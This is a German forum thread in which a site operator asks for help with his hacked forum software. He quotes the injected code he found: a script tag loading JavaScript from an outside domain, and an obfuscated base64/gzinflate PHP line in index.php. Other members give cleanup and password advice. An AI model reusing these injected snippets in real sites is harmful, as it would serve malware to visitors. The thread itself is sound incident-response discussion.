You are not logged in.

Hacker Angriff?

octaviaxxl

Member

  • "octaviaxxl" is male
  • "octaviaxxl" started this thread

Posts: 302

  • Send private message

1

Wednesday, April 25th 2012, 6:02pm

Hacker Angriff?

Hallo, meine Usere meldetetn mir aus 3 verschiedenen Foren, das Ihr Virenprogramm eine Warnung bringt "JS:Iframe-FP" beim Laden der Web-Inhalte gefunden wurde. Die Adresse ist "rec-creations.com".

Ich hab alles abgesucht und bin dann über den Quelltext auf einen Link gestoßen, der ganz am ende hinter

Source code

 
1

</body></html> <script type="text/javascript" src="http://rec-creations.com/player.js"></script>

den mir auch die User gemeldet haben, zufinden in der index.php

Das stand ab Punkt 9 in der Index.PHP

Source code

 
1
2
3

#b58b6f#
echo(gzinflate(base64_decode("JcsxCoAwDADAr5TsNrvY/iWEgC1qQxLE/t6h68EdztY0UkyVAiFfYKeXlkJy4wJnhO6IJryxCUUbj2ceN+pFUyx3h3rgKvUH")));
#/b58b6f#


Kann wer was damit anfangen? Muss ich mir Sorgen machen?
Christian

Netzwerg

Member

  • "Netzwerg" is male

Posts: 5,574

Location: Ruhrpott

Occupation: Student

  • Send private message

2

Wednesday, April 25th 2012, 6:05pm

Quoted from "octaviaxxl"

Kann wer was damit anfangen? Muss ich mir Sorgen machen?

Ja, das gehört da definitiv nicht hin. da hat wohl jemand deinen Webspace infiziert. Du solltest alle Passwörter (MySQl, FTP, ggf. das von deinem Web-Panel) ändern und das Forum von solchen infizierten Stellen befreien (am besten durch Neuinstallation & Datenimport).
Best regards,
Sebastian Teumert

octaviaxxl

Member

  • "octaviaxxl" is male
  • "octaviaxxl" started this thread

Posts: 302

  • Send private message

3

Wednesday, April 25th 2012, 6:15pm

Recht es nicht aus die Datein die geändert wurden zu bearbeiten und alle PWs zu ändern. Wäre der kleinste Aufwand oder würde das zu unsicher sein?
Christian

Netzwerg

Member

  • "Netzwerg" is male

Posts: 5,574

Location: Ruhrpott

Occupation: Student

  • Send private message

4

Wednesday, April 25th 2012, 6:23pm

Wenn du mit Sicherheit sagen kannst, dass du garantiert alle infizierten Dateien findest, kannst du das auch so machen. aber willst du da wirklich deine Hand für ins feuer legen?
Best regards,
Sebastian Teumert

SurfinBird

Member

Posts: 3,171

  • Send private message

5

Wednesday, April 25th 2012, 6:27pm

Man könnte doch das Forum Runterladen und lokal nach

Source code

 
1

echo(gzinflate(base64_decode(


oder

Source code

 
1

#b58b6f#


oder so durchsuchen? Vorausgesetzt es werden nur PHP- und TPL-Files, bzw. für Texteditoren lesbare Daten, befallen kann man dann doch relativ sicher sein?


„Gorgeous designs. We did it. You'll love it.“

octaviaxxl

Member

  • "octaviaxxl" is male
  • "octaviaxxl" started this thread

Posts: 302

  • Send private message

6

Wednesday, April 25th 2012, 6:33pm

Ich bekomme das Forum nicht heruntergeladen, das bricht immer ab, es sind 3 Foren mit je knapp 1.000 bzw 1.500User und je Forum sind das gute 800MB - 1,2 GB. Das heißt auch 3fache Arbeit. Na ich sehe ja per FTP welche daten geändert wurden heut Nacht um 3:49Uhr denn die Tage davor war ja nix und eben die PWs ändern. Ok nen neuinstall ist wohl das sicherste...

Nur was ist wenn die wieder anfangen, jedes Forum hat sein eigenes PW was aus groß/kleinen Buchstaben, Zahlen und Zeichen besteht sowie seine eigene Datenbank. Ok, der Zugang zum MietServer bei All-Inkl ist ja gleich, nur was ist wenn da die Lücke ist.
Christian

double-p

Member

  • "double-p" is male

Posts: 57

Location: Buxtehude

  • Send private message

7

Wednesday, April 25th 2012, 6:38pm

Kein ftp verwenden, sondern etwas verschluesseltes.

octaviaxxl

Member

  • "octaviaxxl" is male
  • "octaviaxxl" started this thread

Posts: 302

  • Send private message

8

Wednesday, April 25th 2012, 6:40pm

Das heißt? Welches Programm sollte man nutzen?
Christian

Netzwerg

Member

  • "Netzwerg" is male

Posts: 5,574

Location: Ruhrpott

Occupation: Student

  • Send private message

9

Wednesday, April 25th 2012, 6:43pm

Quoted from "octaviaxxl"

Ok, der Zugang zum MietServer bei All-Inkl ist ja gleich, nur was ist wenn da die Lücke ist.

deswegen sollst du ja sämtliche passwörter (FTP, mySQl, Webpanel bzw. Kundenzugang) ändern. Am besten gleich auch mal evtl. installierte software ausmisten bzw. nachlesen ob für andere Software, die du einsetzt, Exploits bekannt sind.
Best regards,
Sebastian Teumert

King555

Member

  • "King555" is male

Posts: 603

  • Send private message

10

Wednesday, April 25th 2012, 6:52pm

Es muss ja nicht unbedingt ein Exploit sein. Vielleicht wurden die Passwörter einfach über einen Trojaner ausspioniert. Dann wäre das Ändern der Passwörter vom gleichen PC aus fatal.

Netzwerg

Member

  • "Netzwerg" is male

Posts: 5,574

Location: Ruhrpott

Occupation: Student

  • Send private message

11

Wednesday, April 25th 2012, 6:54pm

Quoted from "King555"

Es muss ja nicht unbedingt ein Exploit sein. Vielleicht wurden die Passwörter einfach über einen Trojaner ausspioniert. Dann wäre das Ändern der Passwörter vom gleichen PC aus fatal.

Seinen eigenen Rechner sollte man dabei natürlich aus sicher halten, da war ich von ausgegangen.
Best regards,
Sebastian Teumert

octaviaxxl

Member

  • "octaviaxxl" is male
  • "octaviaxxl" started this thread

Posts: 302

  • Send private message

12

Wednesday, April 25th 2012, 7:01pm

Ok, was mich wundert ist, das mein Kaspersky dieses Problem nicht gemeldet hat, aber das Avira (oder wie das heißt) von meinem Mod aber schon. Meint Ihr es ist sicherer von einem anderen PC aus alles wieder neu zu installieren und den eigenen Rechner ebenfalls zu Craschen... hab keine Lust nach paar Tagen wieder von vorn zu beginnen.
Christian

Similar threads